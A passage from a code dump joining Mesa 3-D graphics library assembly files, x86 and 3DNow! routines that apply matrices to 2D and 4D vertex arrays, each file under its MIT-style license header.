FXCH( ST(2) ) /* F1 F4 F5 */
FADDP( ST0, ST(2) ) /* F4 F5 */
FSTP_S( DST0 ) /* F5 */
FSTP_S( DST1 ) /* */
MOV_L( EBX, DST2 )
LLBL(x86_p2_3dnrr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p2_3dnrr_loop) )
LLBL(x86_p2_3dnrr_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points2_2d )
HIDDEN(_mesa_x86_transform_points2_2d)
GLNAME( _mesa_x86_transform_points2_2d ):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p2_2dr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(2), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p2_2dr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC0 ) /* F5 F4 */
FMUL_S( MAT1 )
FLD_S( SRC1 ) /* F0 F5 F4 */
FMUL_S( MAT4 )
FLD_S( SRC1 ) /* F1 F0 F5 F4 */
FMUL_S( MAT5 )
FXCH( ST(1) ) /* F0 F1 F5 F4 */
FADDP( ST0, ST(3) ) /* F1 F5 F4 */
FADDP( ST0, ST(1) ) /* F5 F4 */
FXCH( ST(1) ) /* F4 F5 */
FADD_S( MAT12 )
FXCH( ST(1) ) /* F5 F4 */
FADD_S( MAT13 )
FXCH( ST(1) ) /* F4 F5 */
FSTP_S( DST0 ) /* F5 */
FSTP_S( DST1 ) /* */
LLBL(x86_p2_2dr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p2_2dr_loop) )
LLBL(x86_p2_2dr_done):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT4
GLOBL GLNAME( _mesa_x86_transform_points2_2d_no_rot )
HIDDEN(_mesa_x86_transform_points2_2d_no_rot)
GLNAME( _mesa_x86_transform_points2_2d_no_rot ):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p2_2dnrr_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(2), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
ALIGNTEXT16
LLBL(x86_p2_2dnrr_loop):
FLD_S( SRC0 ) /* F4 */
FMUL_S( MAT0 )
FLD_S( SRC1 ) /* F1 F4 */
FMUL_S( MAT5 )
FXCH( ST(1) ) /* F4 F1 */
FADD_S( MAT12 )
FLD_S( MAT13 ) /* F5 F4 F1 */
FXCH( ST(2) ) /* F1 F4 F5 */
FADDP( ST0, ST(2) ) /* F4 F5 */
FSTP_S( DST0 ) /* F5 */
FSTP_S( DST1 ) /* */
LLBL(x86_p2_2dnrr_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p2_2dnrr_loop) )
LLBL(x86_p2_2dnrr_done):
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points2_identity )
HIDDEN(_mesa_x86_transform_points2_identity)
GLNAME( _mesa_x86_transform_points2_identity ):
#define FRAME_OFFSET 12
PUSH_L( ESI )
PUSH_L( EDI )
PUSH_L( EBX )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p2_ir_done) )
MOV_L( REGOFF(V4F_STRIDE, ESI), EAX )
OR_L( CONST(VEC_SIZE_2), REGOFF(V4F_FLAGS, EDI) )
MOV_L( ECX, REGOFF(V4F_COUNT, EDI) )
MOV_L( CONST(2), REGOFF(V4F_SIZE, EDI) )
SHL_L( CONST(4), ECX )
MOV_L( REGOFF(V4F_START, ESI), ESI )
MOV_L( REGOFF(V4F_START, EDI), EDI )
ADD_L( EDI, ECX )
CMP_L( ESI, EDI )
JE( LLBL(x86_p2_ir_done) )
ALIGNTEXT16
LLBL(x86_p2_ir_loop):
MOV_L( SRC0, EBX )
MOV_L( SRC1, EDX )
MOV_L( EBX, DST0 )
MOV_L( EDX, DST1 )
LLBL(x86_p2_ir_skip):
ADD_L( CONST(16), EDI )
ADD_L( EAX, ESI )
CMP_L( ECX, EDI )
JNE( LLBL(x86_p2_ir_loop) )
LLBL(x86_p2_ir_done):
POP_L( EBX )
POP_L( EDI )
POP_L( ESI )
RET
#undef FRAME_OFFSET
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 19,627
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/3dnow_xform4.S
|
/* $Id: 3dnow_xform4.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
#ifdef USE_3DNOW_ASM
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define FRAME_OFFSET 4
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points4_general )
HIDDEN(_mesa_3dnow_transform_points4_general)
GLNAME( _mesa_3dnow_transform_points4_general ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPGR_2 ) )
PREFETCHW ( REGIND(EDX) )
ALIGNTEXT16
LLBL( G3TPGR_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM0 ) /* x1 | x0 */
MOVQ ( REGOFF(8, EAX), MM4 ) /* x3 | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGIND(EAX) )
MOVQ ( MM0, MM2 ) /* x1 | x0 */
MOVQ ( MM4, MM6 ) /* x3 | x2 */
PUNPCKLDQ ( MM0, MM0 ) /* x0 | x0 */
PUNPCKHDQ ( MM2, MM2 ) /* x1 | x1 */
MOVQ ( MM0, MM1 ) /* x0 | x0 */
ADD_L ( CONST(16), EDX ) /* next r */
PFMUL ( REGIND(ECX), MM0 ) /* x0*m1 | x0*m0 */
MOVQ ( MM2, MM3 ) /* x1 | x1 */
PFMUL ( REGOFF(8, ECX), MM1 ) /* x0*m3 | x0*m2 */
PUNPCKLDQ ( MM4, MM4 ) /* x2 | x2 */
PFMUL ( REGOFF(16, ECX), MM2 ) /* x1*m5 | x1*m4 */
MOVQ ( MM4, MM5 ) /* x2 | x2 */
PFMUL ( REGOFF(24, ECX), MM3 ) /* x1*m7 | x1*m6 */
PUNPCKHDQ ( MM6, MM6 ) /* x3 | x3 */
PFMUL ( REGOFF(32, ECX), MM4 ) /* x2*m9 | x2*m8 */
MOVQ ( MM6, MM7 ) /* x3 | x3 */
PFMUL ( REGOFF(40, ECX), MM5 ) /* x2*m11 | x2*m10 */
PFADD ( MM0, MM2 )
PFMUL ( REGOFF(48, ECX), MM6 ) /* x3*m13 | x3*m12 */
PFADD ( MM1, MM3 )
PFMUL ( REGOFF(56, ECX), MM7 ) /* x3*m15 | x3*m14 */
PFADD ( MM4, MM6 )
PFADD ( MM5, MM7 )
PFADD ( MM2, MM6 )
PFADD ( MM3, MM7 )
MOVQ ( MM6, REGOFF(-16, EDX) )
MOVQ ( MM7, REGOFF(-8, EDX) )
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPGR_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPGR_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points4_perspective )
HIDDEN(_mesa_3dnow_transform_points4_perspective)
GLNAME( _mesa_3dnow_transform_points4_perspective ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPPR_2 ) )
PREFETCH ( REGIND(EAX) )
PREFETCHW ( REGIND(EDX) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m11 | m00 */
MOVD ( REGOFF(40, ECX), MM1 ) /* | m22 */
PUNPCKLDQ ( REGOFF(56, ECX), MM1 ) /* m32 | m22 */
MOVQ ( REGOFF(32, ECX), MM2 ) /* m21 | m20 */
PXOR ( MM7, MM7 ) /* 0 | 0 */
ALIGNTEXT16
LLBL( G3TPPR_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM4 ) /* x1 | x0 */
MOVQ ( REGOFF(8, EAX), MM5 ) /* x3 | x2 */
MOVD ( REGOFF(8, EAX), MM3 ) /* | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGOFF(32, EAX) ) /* hopefully stride is zero */
MOVQ ( MM5, MM6 ) /* x3 | x2 */
PFMUL ( MM0, MM4 ) /* x1*m11 | x0*m00 */
PUNPCKLDQ ( MM5, MM5 ) /* x2 | x2 */
ADD_L ( CONST(16), EDX ) /* next r */
PFMUL ( MM2, MM5 ) /* x2*m21 | x2*m20 */
PFSUBR ( MM7, MM3 ) /* | -x2 */
PFMUL ( MM1, MM6 ) /* x3*m32 | x2*m22 */
PFADD ( MM4, MM5 ) /* x1*m11+x2*m21 | x0*m00+x2*m20 */
PFACC ( MM3, MM6 ) /* -x2 | x2*m22+x3*m32 */
MOVQ ( MM5, REGOFF(-16, EDX) ) /* write r0, r1 */
MOVQ ( MM6, REGOFF(-8, EDX) ) /* write r2, r3 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPPR_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPPR_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points4_3d )
HIDDEN(_mesa_3dnow_transform_points4_3d)
GLNAME( _mesa_3dnow_transform_points4_3d ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP3R_2 ) )
MOVD ( REGOFF(8, ECX), MM6 ) /* | m2 */
PUNPCKLDQ ( REGOFF(24, ECX), MM6 ) /* m6 | m2 */
MOVD ( REGOFF(40, ECX), MM7 ) /* | m10 */
PUNPCKLDQ ( REGOFF(56, ECX), MM7 ) /* m14 | m10 */
ALIGNTEXT16
LLBL( G3TP3R_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
PREFETCH ( REGOFF(32, EAX) ) /* hopefully array is tightly packed */
MOVQ ( REGIND(EAX), MM2 ) /* x1 | x0 */
MOVQ ( REGOFF(8, EAX), MM3 ) /* x3 | x2 */
MOVQ ( MM2, MM0 ) /* x1 | x0 */
MOVQ ( MM3, MM4 ) /* x3 | x2 */
MOVQ ( MM0, MM1 ) /* x1 | x0 */
MOVQ ( MM4, MM5 ) /* x3 | x2 */
PUNPCKLDQ ( MM0, MM0 ) /* x0 | x0 */
PUNPCKHDQ ( MM1, MM1 ) /* x1 | x1 */
PFMUL ( REGIND(ECX), MM0 ) /* x0*m1 | x0*m0 */
PUNPCKLDQ ( MM3, MM3 ) /* x2 | x2 */
PFMUL ( REGOFF(16, ECX), MM1 ) /* x1*m5 | x1*m4 */
PUNPCKHDQ ( MM4, MM4 ) /* x3 | x3 */
PFMUL ( MM6, MM2 ) /* x1*m6 | x0*m2 */
PFADD ( MM0, MM1 ) /* x0*m1+x1*m5 | x0*m0+x1*m4 */
PFMUL ( REGOFF(32, ECX), MM3 ) /* x2*m9 | x2*m8 */
ADD_L ( CONST(16), EDX ) /* next r */
PFMUL ( REGOFF(48, ECX), MM4 ) /* x3*m13 | x3*m12 */
PFADD ( MM1, MM3 ) /* x0*m1+..+x2*m9 | x0*m0+...+x2*m8 */
PFMUL ( MM7, MM5 ) /* x3*m14 | x2*m10 */
PFADD ( MM3, MM4 ) /* r1 | r0 */
PFACC ( MM2, MM5 ) /* x0*m2+x1*m6 | x2*m10+x3*m14 */
MOVD ( REGOFF(12, EAX), MM0 ) /* | x3 */
ADD_L ( EDI, EAX ) /* next vertex */
PFACC ( MM0, MM5 ) /* r3 | r2 */
MOVQ ( MM4, REGOFF(-16, EDX) ) /* write r0, r1 */
MOVQ ( MM5, REGOFF(-8, EDX) ) /* write r2, r3 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP3R_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP3R_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points4_3d_no_rot )
HIDDEN(_mesa_3dnow_transform_points4_3d_no_rot)
GLNAME( _mesa_3dnow_transform_points4_3d_no_rot ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP3NRR_2 ) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m11 | m00 */
MOVD ( REGOFF(40, ECX), MM2 ) /* | m22 */
PUNPCKLDQ ( REGOFF(56, ECX), MM2 ) /* m32 | m22 */
MOVQ ( REGOFF(48, ECX), MM1 ) /* m31 | m30 */
ALIGNTEXT16
LLBL( G3TP3NRR_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM4 ) /* x1 | x0 */
MOVQ ( REGOFF(8, EAX), MM5 ) /* x3 | x2 */
MOVD ( REGOFF(12, EAX), MM7 ) /* | x3 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGOFF(32, EAX) ) /* hopefully stride is zero */
MOVQ ( MM5, MM6 ) /* x3 | x2 */
PFMUL ( MM0, MM4 ) /* x1*m11 | x0*m00 */
PUNPCKHDQ ( MM6, MM6 ) /* x3 | x3 */
PFMUL ( MM2, MM5 ) /* x3*m32 | x2*m22 */
PFMUL ( MM1, MM6 ) /* x3*m31 | x3*m30 */
PFACC ( MM7, MM5 ) /* x3 | x2*m22+x3*m32 */
PFADD ( MM6, MM4 ) /* x1*m11+x3*m31 | x0*m00+x3*m30 */
ADD_L ( CONST(16), EDX ) /* next r */
MOVQ ( MM4, REGOFF(-16, EDX) ) /* write r0, r1 */
MOVQ ( MM5, REGOFF(-8, EDX) ) /* write r2, r3 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP3NRR_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP3NRR_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points4_2d )
HIDDEN(_mesa_3dnow_transform_points4_2d)
GLNAME( _mesa_3dnow_transform_points4_2d ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP2R_2 ) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(16, ECX), MM0 ) /* m10 | m00 */
MOVD ( REGOFF(4, ECX), MM1 ) /* | m01 */
PUNPCKLDQ ( REGOFF(20, ECX), MM1 ) /* m11 | m01 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
ALIGNTEXT16
LLBL( G3TP2R_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM3 ) /* x1 | x0 */
MOVQ ( REGOFF(8, EAX), MM5 ) /* x3 | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGIND(EAX) )
MOVQ ( MM3, MM4 ) /* x1 | x0 */
MOVQ ( MM5, MM6 ) /* x3 | x2 */
PFMUL ( MM1, MM4 ) /* x1*m11 | x0*m01 */
PUNPCKHDQ ( MM6, MM6 ) /* x3 | x3 */
PFMUL ( MM0, MM3 ) /* x1*m10 | x0*m00 */
ADD_L ( CONST(16), EDX ) /* next r */
PFACC ( MM4, MM3 ) /* x0*m01+x1*m11 | x0*m00+x1*m10 */
PFMUL ( MM2, MM6 ) /* x3*m31 | x3*m30 */
PFADD ( MM6, MM3 ) /* r1 | r0 */
MOVQ ( MM5, REGOFF(-8, EDX) ) /* write r2, r3 */
MOVQ ( MM3, REGOFF(-16, EDX) ) /* write r0, r1 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP2R_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP2R_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points4_2d_no_rot )
HIDDEN(_mesa_3dnow_transform_points4_2d_no_rot)
GLNAME( _mesa_3dnow_transform_points4_2d_no_rot ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP2NRR_3 ) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m11 | m00 */
MOVQ ( REGOFF(48, ECX), MM1 ) /* m31 | m30 */
ALIGNTEXT16
LLBL( G3TP2NRR_2 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM4 ) /* x1 | x0 */
MOVQ ( REGOFF(8, EAX), MM5 ) /* x3 | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGIND(EAX) )
PFMUL ( MM0, MM4 ) /* x1*m11 | x0*m00 */
MOVQ ( MM5, MM6 ) /* x3 | x2 */
ADD_L ( CONST(16), EDX ) /* next r */
PUNPCKHDQ ( MM6, MM6 ) /* x3 | x3 */
PFMUL ( MM1, MM6 ) /* x3*m31 | x3*m30 */
PFADD ( MM4, MM6 ) /* x1*m11+x3*m31 | x0*m00+x3*m30 */
MOVQ ( MM6, REGOFF(-16, EDX) ) /* write r0, r1 */
MOVQ ( MM5, REGOFF(-8, EDX) ) /* write r2, r3 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP2NRR_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP2NRR_3 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points4_identity )
HIDDEN(_mesa_3dnow_transform_points4_identity)
GLNAME( _mesa_3dnow_transform_points4_identity ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPIR_2 ) )
ALIGNTEXT16
LLBL( G3TPIR_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM0 ) /* x1 | x0 */
MOVQ ( REGOFF(8, EAX), MM1 ) /* x3 | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGIND(EAX) )
ADD_L ( CONST(16), EDX ) /* next r */
MOVQ ( MM0, REGOFF(-16, EDX) ) /* r1 | r0 */
MOVQ ( MM1, REGOFF(-8, EDX) ) /* r3 | r2 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPIR_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPIR_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 14,675
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/x86_xform4.S
|
/* $Id: x86_xform4.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/*
* NOTE: Avoid using spaces in between '(' ')' and arguments, especially
* with macros like CONST, LLBL that expand to CONCAT(...). Putting spaces
* in there will break the build on some platforms.
*/
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define FP_ONE 1065353216
#define FP_ZERO 0
#define SRC0 REGOFF(0, ESI)
#define SRC1 REGOFF(4, ESI)
#define SRC2 REGOFF(8, ESI)
#define SRC3 REGOFF(12, ESI)
#define DST0 REGOFF(0, EDI)
#define DST1 REGOFF(4, EDI)
#define DST2 REGOFF(8, EDI)
#define DST3 REGOFF(12, EDI)
#define MAT0 REGOFF(0, EDX)
#define MAT1 REGOFF(4, EDX)
#define MAT2 REGOFF(8, EDX)
#define MAT3 REGOFF(12, EDX)
#define MAT4 REGOFF(16, EDX)
#define MAT5 REGOFF(20, EDX)
#define MAT6 REGOFF(24, EDX)
#define MAT7 REGOFF(28, EDX)
#define MAT8 REGOFF(32, EDX)
#define MAT9 REGOFF(36, EDX)
#define MAT10 REGOFF(40, EDX)
#define MAT11 REGOFF(44, EDX)
#define MAT12 REGOFF(48, EDX)
#define MAT13 REGOFF(52, EDX)
#define MAT14 REGOFF(56, EDX)
#define MAT15 REGOFF(60, EDX)
ALIGNTEXT16
GLOBL GLNAME( _mesa_x86_transform_points4_general )
HIDDEN(_mesa_x86_transform_points4_general)
GLNAME( _mesa_x86_transform_points4_general ):
#define FRAME_OFFSET 8
PUSH_L( ESI )
PUSH_L( EDI )
MOV_L( ARG_SOURCE, ESI )
MOV_L( ARG_DEST, EDI )
MOV_L( ARG_MATRIX, EDX )
MOV_L( REGOFF(V4F_COUNT, ESI), ECX )
TEST_L( ECX, ECX )
JZ( LLBL(x86_p4_gr_done) )
